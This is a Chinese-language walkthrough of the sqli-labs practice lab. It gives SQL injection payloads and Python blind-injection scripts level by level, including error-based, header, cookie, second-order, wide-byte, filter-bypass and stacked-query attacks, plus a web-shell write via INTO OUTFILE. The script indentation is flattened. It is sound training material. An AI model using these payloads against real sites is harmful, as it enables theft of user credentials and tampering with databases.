?id=1'
单引号报错,存在注入
?id=1' order by 4 %23'
报错,存在三列
?id=-1' union select 1,2,3%23
发现2和3的位置可以回显,于是进行注入
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 %23
得到当前库下所有表名
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3%23
得到users表下的所有列名
?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)%23
得到所有的username和password
less-1用单引号闭合了,而这里的id是整型,其他的注入方法与less-1相同。
最终payload:
?id=-1 union select 1,(select group_concat(username) from users),(select group_concat(password) from users)%23
区别是这里用')
进行闭合
最终payload:
?id=-1') union select 1,(select group_concat(username) from users),(select group_concat(password) from users)%23
区别是这里用")
进行闭合
最终payload:
?id=-1") union select 1,(select group_concat(username) from users),(select group_concat(password) from users)%23
发现有回显"You are in…"和不回显两种情况
?id=1' and 1=1%23 You are in...........
?id=1' and 1=2%23 不回显
判断为盲注,这里可以直接用sqlmap跑出来,但为了学习,还是自己写个脚本吧!
脚本如下,只跑了一下库名,其他的类似,改一下payload即可:
# bool-base script
# auther:Lethe
import requests
s = requests.Session()
url = 'http://43.247.91.228:84/Less-5/'
payloads = 'QqWwEeRrTtYyUuIiOoPpAaSsDdFfGgHhJjKkLlZzXxCcVvBbNnMm{},_'
data = ''
for i in range(50):
for j in payloads:
# payload = f"?id=1' and substr(binary database(),{i},1)='{j}'%23"
# payload = f"?id=1' and substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()) ,{i},1)='{j}'%23"
payload = f"?id=1' and substr((select binary group_concat(column_name) from information_schema.columns where table_name='users') ,{i},1)='{j}'%23"
if "You are in..........." in s.get(url+payload).text:
data += j
break
print(data)
同样是bool盲注,双引号报错,判断为双引号闭合,将less-5的脚本中payload的单引号改为双引号即可。
测试发现id=1'
报错,但把后面的语句注释掉扔报错,还有括号闭合,发现加两个括号判断为(('$id'))
闭合。
根据提示Use outfile…,应该是具有导出什么的了。
(1)首先判断是否有权限:
?id=1')) and (select count(*) from mysql.user)>0--+
没有报错,具有root权限。
(2)于是将数据导出:
?id=-1')) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) into outfile "E:\\CTF\\less-7\\table.txt"--+
导出所有表
?id=-1')) union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') into outfile "E:\\CTF\\less-7\\column.txt"--+
导出user表中所有列名
?id=-1')) union select 1,2,(select group_concat(username,password) from users) into outfile "E:\\CTF\\less-7\\data.txt"--+
导出用户名和密码
注意:在Mysql中,需要注意路径转义的问题,即用\\
分隔。
另一种也可以向根目录下写入一句话木马,再用菜刀连接:
?id=-1')) union select 1,2,'' into outfile "D:\\PHPWAMP_IN3\\wwwroot\\sqli-labs-master\\Less-7\\shell.php"--+
单引号闭合的盲注,用less-5的脚本跑一下即可。
发现页面无论对错都只回显You are in...........
测试?id=1' and sleep(3)%23
页面会延时3秒再回显,判断为时间盲注
脚本如下:
# less-9 time-base script
# auther:Lethe
import requests
url = 'http://43.247.91.228:84/Less-9/'
payloads = 'QqWwEeRrTtYyUuIiOoPpAaSsDdFfGgHhJjKkLlZzXxCcVvBbNnMm{},_'
data = ''
for i in range(50):
for j in payloads:
# payload = f"?id=1' and if((substr(binary database(),{i},1)='{j}'),sleep(2),1)%23"
# payload = f"?id=1' and if((substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()) ,{i},1)='{j}'),sleep(2),1)%23"
payload = f"?id=1' and if((substr((select binary group_concat(column_name) from information_schema.columns where table_name='users') ,{i},1)='{j}'),sleep(2),1)%23"
try:
r = requests.get(url+payload, timeout=1)
except Exception:
data += j
print(data)
break
双引号闭合的时间盲注。
稍微改一下less-9的脚本即可:
# less-10 script
# auther:Lethe
import requests
url = 'http://43.247.91.228:84/Less-10/'
payloads = 'QqWwEeRrTtYyUuIiOoPpAaSsDdFfGgHhJjKkLlZzXxCcVvBbNnMm{},_'
data = ''
for i in range(50):
for j in payloads:
# payload = f"?id=1\" and if((substr(binary database(),{i},1)='{j}'),sleep(2),1)%23"
# payload = f"?id=1\" and if((substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()) ,{i},1)='{j}'),sleep(2),1)%23"
payload = f"?id=1\" and if((substr((select binary group_concat(column_name) from information_schema.columns where table_name='users') ,{i},1)='{j}'),sleep(2),1)%23"
try:
r = requests.get(url+payload, timeout=1)
except Exception:
data += j
print(data)
break
是一个登录框,后端语句为:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
所有构造万能密码即可:
即Username为1' or 1=1#
,Password为任意值。
因为这里是Post方式传到后端,因此注释符只能用#
与上题的区别是这里用("$uname")
进行闭合
因此构造Username为1") or 1=1#
闭合方式为:('$uname')
因此构造Username为1') or 1=1#
闭合方式为:"$uname"
因此构造Username为1" or 1=1#
字符型POST盲注
构造1' or 1=1#
即可登陆
要想通过这个注入出数据,可以写个脚本,但这里回显的语句是图片,不好进行bool盲注,于是考虑时间盲注。
发现构造:1' or sleep(3)#
页面会进行延时,所以脚本如下:
# less-15
# auther:Lethe
import requests
url = 'http://43.247.91.228:84/Less-15/'
payloads = 'QqWwEeRrTtYyUuIiOoPpAaSsDdFfGgHhJjKkLlZzXxCcVvBbNnMm{},_'
data = ''
for i in range(50):
for j in payloads:
# payload = {'uname':f"1' or if((substr(binary database(),{i},1)='{j}') ,sleep(2),1)# " ,'passwd':'lethe','submit':'Submit'}
# payload = {'uname':f"1' or if((substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()) ,{i},1)='{j}'),sleep(2),1)# " ,'passwd':'lethe','submit':'Submit'}
payload = {'uname':f"1' or if((substr((select binary group_concat(column_name) from information_schema.columns where table_name='users') ,{i},1)='{j}'),sleep(2),1)# " ,'passwd':'lethe','submit':'Submit'}
try:
r = requests.post(url, data=payload, timeout=1)
except Exception:
data += j
print(data)
break
将less-15中的闭合方式改为("$uname")
即可,其他都一样。
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
这里用check_input函数对username的值进行了过滤,而对password没有限制,因此考虑构造password。
可利用只有Update语句:
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
所以利用报错注入,可以参考这篇文章:Mysql报错注入总结
主要的分为三种方法:
mysql> select (select(!x-~0)from(select(select user())x)a);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'
在mysql>5.5.53时,则不能返回查询结果
mysql> select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
mysql> select extractvalue(1,concat(0x7e,(select @@version),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
mysql> select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'
mysql> select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'
mysql> select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a;
ERROR 1062 (23000): Duplicate entry '5.5.54-log1' for key 'group_key'
这题我采用extractvalue报错,payload如下:
User Name: admin
New Password : 1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#
回显:XPATH syntax error: '~emails,referers,uagents,users~'
User Name: admin
New Password : 1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))#
回显:XPATH syntax error: '~id,username,password~'
User Name: admin
New Password : 1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))#
回显:XPATH syntax error: '~id,username,password~'
接下来,当想要注出user表中的数据时,会报错:You can't specify target table 'users' for update in FROM clause
,因为在同一语句中,不能先select出同一表中的某些值,再update这个表。
所以要通过子查询,使select的表更换一个名称。
payload:
User Name: admin
New Password : 1' and extractvalue(1,concat(0x7e,( select * from ( select group_concat(username,password) from users )a),0x7e))#
回显:XPATH syntax error: '~id,username,password~'
发现报错的信息字数有限,因此想要获得全部数据的化可以通过limit语句一条条的读:
1' and extractvalue(1,concat(0x7e,( select * from ( select concat_ws(':',username,password) from users limit 0,1)a),0x7e))#
进入页面发现会显示Your IP ADDRESS is: xxx.xxx.xxx.xxx
,再根据名字判断应该是HTTP首部注入,注入的字段可能是X-Forward-For之类的地方,但登陆后会回显User-Agent的内容,这里是通过User-Agent进行注入。
同样是报错注入:
先尝试:
由报错信息可以推测后台Insert语句····VALUES ('$uagent', '$IP', $uname)
因此构造payload:
1' and extractvalue(1,concat(0x7e,(select database()),0x7e)),'','')#
最终payload:(通过改变limit语句逐条注出数据)
1' and extractvalue(1,concat(0x7e,( select * from ( select concat_ws(':',username,password) from users limit 0,1)a),0x7e)),'','')#
同样登陆后回显Referer的内容,应该是通过http首部的Referer字段进行注入。
先判断后台Insert语句:
大致为:···VALUES ('$uagent', '$IP')
于是payload:
1' and updatexml(1,concat(0x7e,(select * from ( select concat_ws(':',username,password) from users limit 0,1)a),0x7e),1),'')#
同样是http首部注入,这里是通过Cookie注入,大体流程和前面差不多。
payload:
uname=1' and updatexml(1,concat(0x7e,(select * from ( select concat_ws(':',username,password) from users limit 0,1)a),0x7e),1)#
这一关和less-20的区别就是对Cookie的uname进行了一下base64的编码,同时用('')
进行的闭合。
所以payload:
uname=1') and updatexml(1,concat(0x7e,(select * from ( select concat_ws(':',username,password) from users limit 0,1)a),0x7e),1)#
base64一下得到:
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0ICogZnJvbSAoIHNlbGVjdCBjb25jYXRfd3MoJzonLHVzZXJuYW1lLHBhc3N3b3JkKSBmcm9tIHVzZXJzIGxpbWl0IDAsMSlhKSwweDdlKSwxKSM=
将Cookie设为base64后的payload
与less-21的区别是这里用了"
进行闭合,其他都一样。
payload:
uname=MSIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgKiBmcm9tICggc2VsZWN0IGNvbmNhdF93cygnOicsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgbGltaXQgMCwxKWEpLDB4N2UpLDEpIw==
单引号闭合且过滤了注释符#
和--
因此使用union注入时,要构造sql语句闭合前后的单引号。
payload:(注意最后有个单引号用来闭合)
?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)'
根据名字,是一道二次注入的题目,二次注入的题一般都要通过代码审计找出可控点,否则很难注入。
那就进行代码审计,整个代码逻辑比较简单:注册 => 登陆(登陆时login.php会设置Session)=> 登陆后可以修改密码
重点关注一下操作数据库的部分,发现只有一个地方的变量在拼接到sql语句中时没有用mysql_real_escape_string()
函数进行过滤,在pass_change.php中。
if (isset($_POST['submit']))
{
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
echo '';
echo '' ;
if($row==1)
{
echo "Password successfully updated";
}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '' ;
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php');
}
}
即上述代码中的$username
在用Update语句进行修改密码时,直接从Session中获取了,没有进行任何过滤。
那么我们再来看看整个$_SESSION["username"]
是如何定义的,在login.php中:
function sqllogin(){
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
$res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
$row = mysql_fetch_row($res);
//print_r($row) ;
if ($row[1]) {
return $row[1];
} else {
return 0;
}
}
$login = sqllogin();
if (!$login== 0)
{
$_SESSION["username"] = $login;
setcookie("Auth", 1, time()+3600); /* expire in 15 Minutes */
header('Location: logged-in.php');
}
......
可以看到$_SESSION["username"]
是在登陆成功时直接从数据库中取出用户名,没有进行过滤,而这个用户名我们在注册新用户的时候是可控的,这样就找到了可控变量,注入思路也就清楚了0。
也就是说虽然在注册的时候构造的payload被过滤了没有办法注入,但是依旧会存到数据库里,当你直接取出并拼接到另一个sql语句时就造成了二次注入。
注入过程:
注册一个用户名为admin'#
的用户,并登陆。
这样在修改密码时,拼接过后的Update语句就为:
UPDATE users SET PASSWORD='$pass' where username=' admin'# ' and password='$curr_pass'
也就可以修改admin用户的密码了。
单引号闭合,过滤了or
、and
、&&
:
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
可以采用双写绕过。
payload:(注意information
和password
里也有or
,需要双写)
?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='users'),3--+
?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(passwoorrd) from users)--+
过滤和绕过方式同less-25,区别是不需要单引号闭合了。
payload:
?id=-1 union select 1,(select group_concat(username) from users),(select group_concat(passwoorrd) from users)--+
过滤了or,and,-,#,&&,空格、内联注释符(/**/)
/**/
可以用来绕过空格,但这里被过滤了,所以用%a0
绕过or
和and
依旧用双写绕过,payload:
?id=0'%a0union%a0select%a01,(select%a0group_concat(passwoorrd)%a0from%a0users),'3
和上题一样,只不过是用('$id')闭合
payload:
?id=0')%a0union%a0select%a01,(select%a0group_concat(passwoorrd)%a0from%a0users),('3
在前面的基础上,少过滤了or
和and
,多过滤了union或UNION
和select或UNION
,这里union
可以用双写或大小写绕过,而select
只能用大小写绕过,应该是过滤时使用了全局匹配。
payload:
?id=0'%a0uNIon%a0seLEct%a01,(seLEct%a0group_concat(password)%a0from%a0users),'3
双引号闭合,其他和less-27一样。
?id=0"%a0uNIon%a0seLEct%a01,(seLEct%a0group_concat(password)%a0from%a0users),"3
('$id')
闭合,其他和less-27一样。
payload:
?id=0')%a0uNIon%a0seLEct%a01,(seLEct%a0group_concat(password)%a0from%a0users),('3
和less-28一模一样…
payload:
?id=0')%a0uNIon%a0seLEct%a01,(seLEct%a0group_concat(password)%a0from%a0users),('3
Less 29 - Less 31这三关实际上是两层服务器架构,在做这三关之前需要把 Tomcat 为引擎的 jsp 服务器搭好。
参考:MySQL注入天书
重点:对于index.php?id=1&id=2
该如何解析呢?实际上apache(php)解析最后一个参数,即显示id=2的内容,而Tomcat(jsp)解析第一个参数,即显示id=1的内容
整个逻辑大概就是,获取url中查询的部分,第一个id
的值经过java_implimentation()
处理看是否符合whitelist()
函数的过滤要求,若不符合就检测出攻击,否则就把第二个id
的值拼接到sql语句中进行查询。
那我们分别看看这两个函数:
whitelist()
比较简单,就是要求传入的参数必须是一位以上的数字
java_implimentation()
则将传入的参数以&
为分隔符分为两部分,然后进行遍历,若前两个字符为id
则返回后面3到30个字符。
因此构造payload:
?id=123&id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
同上,不过是双引号闭合。
payload:
?id=123&id=-1" union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
同上,不过是("$id")
闭合。
payload:
?id=123&id=-1") union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
这一关将payload中的单引号前面加上了\
进行过滤,想到宽字节注入,即利用gbk编码%df
+%5c(\)
组合出了一个 運
字。
注意,这里除了闭合的时候需要考虑绕过单引号,在注入出列名的时候,也需要用到单引号,但这里就不能用%df
绕过了,如下面payload中的表名users
:
?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+
这里可以用16进制绕过,即用user
的16进制0x7573657273
代替它,表名为16进制时不需要再用引号了。
payload:
?id=-1%df' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+
?id=-1%df' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
与less-32一样…
payload:
?id=-1%df' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
这关的过滤方式和前面一样,考虑宽字节注入,但是POST传入数据时不会进行URL编码,因此这里采用将utf8单引号转为utf-16/utf-32编码绕过,即将'
转为utf-16为 �'
payload:
万能密码:
Username: 1�' or 1=1#
Password: 任意
GET型宽字解注入,但区别是这里是数字型,不需要用单引号闭合了,其他的和less-32一样,16进制绕过一下表名即可。
payload:
?id=-1 union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
好像和less-32一样…
payload:
?id=-1%df' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+
好像和less-34一样…
payload:
万能密码:
Username: 1�' or 1=1#
Password: 任意
堆叠注入,可以执行多条语句,用分号间隔,可参考:https://www.cnblogs.com/lcamry/p/5762905.html
堆叠注入优点是可以执行的语句更加灵活,如Create、Delete、Update、Insert、Drop…,但代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。
如执行如下payload:
?id=1';create table Lethe like users--+
执行完后页面没有变,但是查询表时可以发现多出了lethe
表:
再将这个表删除:?id=1';drop table Lethe--+
发现Lethe
表已被删除。
同样,我也可以在它的user
表中插入我们自己的一条信息:
?id=1';insert into users(id,username,password) values('20','Lethe','Lethe')--+
和less-38一样,只不过这里是数字型,无需闭合。
?id=1;insert into users(id,username,password) values('20','Lethe','Lethe')--+
和前面两关的区别是这里用('$id')
闭合
?id=1');insert into users(id,username,password) values('20','Lethe','Lethe')--+
和less-39一样,?id=1
和?id=2-1
返回相同结果,数字型注入。
?id=1;insert into users(id,username,password) values('20','Lethe','Lethe')--+
进入页面是一个登陆窗口,发现注册不了,提示要我们hack
掉它,根据前面,判断应该是用堆叠注入插入一个用户到数据库中,来进行登陆。
但这里对Usernmae进行了过滤,因此利用Password来进行堆叠注入。
payload:
Username:任意
Password:1';insert into users(id,username,password) values('20','Lethe','Lethe')#
先利用payload尝试登陆,虽然显示登陆失败,但实际上堆叠注入的语句已经执行,然后再用账户密码均为Lethe
的账户进行登陆,发现可以登陆成功。
如果还希望越权的话,原理参考less-24,构造1';insert into users(id,username,password) values("25","admin'#","123")#
,这样就插入可用户名为admin'#
,密码为123
的用户,登陆此账号:
然后用此账号进行修改密码,实际上修改了用户admin
的密码。
与less-42一样,区别是这里用('$password')
闭合。
payload:
Username:任意
Password:1');insert into users(id,username,password) values('20','Lethe','Lethe')#
好像和less-42一样…
payload:
Username:任意
Password:1';insert into users(id,username,password) values('20','Lethe','Lethe')#
好像和less-43一样…
payload:
Username:任意
Password:1');insert into users(id,username,password) values('20','Lethe','Lethe')#
order by注入,?id=1 desc
和?id=1 asc
返回的数据有区别说明可以进行注入。
rand(true)
和rand(false)
返回的结果也不一样,可以利用这一点进行布尔盲注。?sort=id ^(select(select version()) regexp '^5')
,原理就是就是在regexp
正则匹配的时候,如果匹配到数据返回1(00000001)的时候,此时的1会和id中的数据的二进制进行异或,按照异或的结果进行升序排列,所以显示的排列会发生变化;反之当进行正则匹配的时候,未匹配到数据返回0(00000000),此时数字和0异或的结果还是本身,所以显示的排列不会发生改变,所以可以布尔盲注,逐个猜解数据,当页面排序紊乱时则说明匹配正确,页面排序未发生紊乱时则说明匹配错误。?sort=1 and (if((ascii(substr((select database() limit 0,1),1,1))=115),sleep(5),1))–+
进行时间盲注这里采用报错注入,payload:(报错字数有限,可修改limit的值逐条读出数据)
?sort=1 and extractvalue(1,concat(0x7e,( select concat_ws(':',username,password) from users limit 0,1),0x7e))
单引号闭合sort,其他的与上一关一样。
payload:
?sort=1' and extractvalue(1,concat(0x7e,( select concat_ws(':',username,password) from users limit 0,1),0x7e))--+
这一关原理同less-46,但是不会回显报错信息,所以不能使用报错注入。
采用时间盲注,脚本如下:
# less-48
# auther:Lethe
import requests
url = 'http://43.247.91.228:84/Less-48/'
payloads = 'QqWwEeRrTtYyUuIiOoPpAaSsDdFfGgHhJjKkLlZzXxCcVvBbNnMm{},_'
data = ''
for i in range(50):
for j in payloads:
# payload = f"?sort=1 and if((substr(binary database(),{i},1)='{j}'),sleep(3),1)"
# payload = f"?sort=1 and if((substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()) ,{i},1)='{j}'),sleep(3),1)"
payload = f"?sort=1 and if((substr((select binary group_concat(column_name) from information_schema.columns where table_name='users') ,{i},1)='{j}'),sleep(3),1)"
try:
r = requests.get(url+payload, timeout=1)
except Exception:
data += j
print(data)
break
同less-47单引号闭合,但是不能回显报错信息,所以还是采用时间盲注,脚本如下:
# less-49
# auther:Lethe
import requests
url = 'http://43.247.91.228:84/Less-49/'
payloads = 'QqWwEeRrTtYyUuIiOoPpAaSsDdFfGgHhJjKkLlZzXxCcVvBbNnMm{},_'
data = ''
for i in range(50):
for j in payloads:
# payload = f"?sort=1' and if((substr(binary database(),{i},1)='{j}'),sleep(3),1)--+"
# payload = f"?sort=1' and if((substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()) ,{i},1)='{j}'),sleep(3),1)--+"
payload = f"?sort=1' and if((substr((select binary group_concat(column_name) from information_schema.columns where table_name='users') ,{i},1)='{j}'),sleep(3),1)--+"
try:
r = requests.get(url+payload, timeout=1)
except Exception:
data += j
print(data)
break
这一关是order by与堆叠注入结合,数字型,无闭合。
payload:
?sort=1;insert into users(id,username,password) values('20','lethe','lethe')--+
执行完上面payload后再?sort=1
可以看到多出来一行数据
与上一关的区别是这里用单引号进行了闭合。
payload:
?sort=1';insert into users(id,username,password) values('20','lethe','lethe')--+
和less-50一样,只是不会回显错误,堆叠注入方式相同。
payload:
?sort=1;insert into users(id,username,password) values('20','lethe','lethe')--+
和less-51一样,只是不会回显错误,堆叠注入方式相同。
payload:
?sort=1';insert into users(id,username,password) values('20','lethe','lethe')--+
限制了只能在10次请求以内完成注入,且每次重置会生成随机的表名、列名和数据。
payload:
?id=1'
?id=1'--+
?id=1' order by 3--+
?id=1' order by 4--+
?id=-1' union select 1,2,3--+
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
得到表名3UXZWY1KY9
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='3UXZWY1KY9'),3--+
得到四个列名id,sessid,secret_7RZ7,tryy
?id=-1' union select 1,(select group_concat(secret_7RZ7) from 3UXZWY1KY9),3--+
得到数据VWKFpeoXofNsCqqxcfWGM9x7,并提交
这里比上一关多给了四次机会,得先花不少次猜测闭合方式,按照前面提到的顺序,先猜单双引号和单独括号,然后在单双引号后逐个添加括号,一般最多两个括号,若有报错信息同时要关注报错的信息来进行判断。
本关闭合方式为:($id)
知道了闭合方式后其他的和上一关就一样了。
payload:
······
?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
得到表名P6BV60ROT2
?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_name='P6BV60ROT2'),3--+
得到四个列名id,sessid,secret_EWSR,tryy
?id=-1) union select 1,(select group_concat(secret_EWSR) from P6BV60ROT2),3--+
得到数据Pwh5inh7TxaAV10IZRCc26MW
闭合方式为:('$id')
,其他的和上面一样。
payload:
······
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
得到表名QS5C6XI6F0
?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='QS5C6XI6F0'),3--+
得到四个列名id,sessid,secret_PYBQ,tryy
?id=-1') union select 1,(select group_concat(secret_PYBQ) from QS5C6XI6F0),3--+
得到数据bHnjS8Y6KtGQDTihKBCDG7sU
闭合方式为:"$id"
,其他的和上面一样。
payload:
······
?id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
得到表名9ODZ61QBP1
?id=-1" union select 1,(select group_concat(column_name) from information_schema.columns where table_name='9ODZ61QBP1'),3--+
得到四个列名id,sessid,secret_Z0TV,tryy
?id=-1" union select 1,(select group_concat(secret_Z0TV) from 9ODZ61QBP1 ),3--+
得到数据0MNZ3yAJ3N0XuSZIlYhrGbcj
单引号闭合,但是只有五次机会。
但是尝试?id=-1' union select 1,2,3--+
时发现页面无法回显sql语句的结果,所以前面几关的方法不能用了,但是页面会回显错误信息,所以考虑报错注入。
payload:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
得到表名AK0HRXW75I
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='AK0HRXW75I'),0x7e))--+
得到四个列名id,sessid,secret_RPHD,tryy
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_RPHD) from AK0HRXW75I),0x7e))--+
得到数据7wEINBWYdYvusRUrsV9bidFL
这一关为数字型,未进行闭合,其他的与less-58相同。
payload:
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
得到表名NTGAY0ES0F
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='NTGAY0ES0F'),0x7e))--+
得到四个列名id,sessid,secret_9Y69,tryy
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(secret_9Y69) from NTGAY0ES0F),0x7e))--+
得到数据UpD0J8a6Q7RFjeMejjCujser
经测试,闭合方式为:("$id")
,其他与前两关相同。
payload:
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
得到表名HJ31CD4SZJ
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='HJ31CD4SZJ'),0x7e))--+
得到四个列名id,sessid,secret_L5OI,tryy
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(secret_L5OI) from HJ31CD4SZJ),0x7e))--+
得到数据RbCnjPhpQjy7psK1DXG1IL78
经测试,闭合方式为:(('$id'))
,其他与前两关相同。
payload:
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
得到表名S0EAHB4X1I
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='S0EAHB4X1I'),0x7e))--+
得到四个列名id,sessid,secret_5AJ4,tryy
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_5AJ4) from S0EAHB4X1I),0x7e))--+
得到数据5SIpSyz03MhX52krjGbqHot7
经测试,闭合方式为:('$id')
,这一关既不回显sql语句结果,也不回显错误信息,那就只能盲注了,要求是130次请求以内完成盲注。
下面关键就是如何减少请求的次数了…
那么首先,如果能知道跑出的数据,长度为多少肯定是最好的,就没必要进行多余的爆破了…
limit 2,1
之筛选出这个列名,甚至我们只需要跑出最后那随机的4位即可,前面的secret_
是都一样的。除此之外,我前面的脚本都是采取顺序爆破的,这样更方便一点,但这里可以采用二分法来进行盲注,可以减少请求的次数。
脚本如下:
(1)表名:(已测试出表名长度为10)
import requests
url = 'http://43.247.91.228:84/Less-62/'
data = ''
payloads = list(range(48,58))+list(range(65,91)) # 大写字母和数字的ascii,len=36
# payloads = list(range(48,58))+list(range(65,91))+list(range(97,123)) # 大写字母、小写字母和数字的ascii,len=62
for i in range(1,11):
low = 0
high =35
# high = 61
while high-low>1:
mid = (high + low)//2
m = payloads[mid]
payload = f"?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{m}--+"
r = requests.get(url+payload)
if 'Angelina' in r.text:
low = mid
else:
high = mid
data += chr(payloads[high])
print(data)
(2)列名:(只爆破最后随机的4位)
import requests
url = 'http://43.247.91.228:84/Less-62/'
data = ''
payloads = list(range(48,58))+list(range(65,91)) # 大写字母和数字的ascii,len=36
# payloads = list(range(48,58))+list(range(65,91))+list(range(97,123)) # 大写字母、小写字母和数字的ascii,len=62
for i in range(8,12):
low = 0
high =35
# high = 61
while high-low>1:
mid = (high + low)//2
m = payloads[mid]
# payload = f"?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{m}--+"
payload = f"?id=1') and ascii(substr((select column_name from information_schema.columns where table_name='1X6T9FDAIW' limit 2,1),{i},1))>{m}--+"
r = requests.get(url+payload)
if 'Angelina' in r.text:
low = mid
else:
high = mid
data += chr(payloads[high])
print(data)
import requests
url = 'http://43.247.91.228:84/Less-62/'
data = ''
# payloads = list(range(48,58))+list(range(65,91)) # 大写字母和数字的ascii,len=36
payloads = list(range(48,58))+list(range(65,91))+list(range(97,123)) # 大写字母、小写字母和数字的ascii,len=62
for i in range(1,25):
low = 0
# high =35
high = 61
while high-low>1:
mid = (high + low)//2
m = payloads[mid]
# payload = f"?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{m}--+"
# payload = f"?id=1') and ascii(substr((select column_name from information_schema.columns where table_name='1X6T9FDAIW' limit 2,1),{i},1))>{m}--+"
payload = f"?id=1') and ascii(substr((select group_concat(secret_SQOB) from 1X6T9FDAIW),{i},1))>{m}--+"
r = requests.get(url+payload)
if 'Angelina' in r.text:
low = mid
else:
high = mid
data += chr(payloads[high])
print(data)
闭合方式为:'$id'
,其他的与less-62相同。
闭合方式为:(($id))
,其他的与less-62相同。
闭合方式为:("$id")
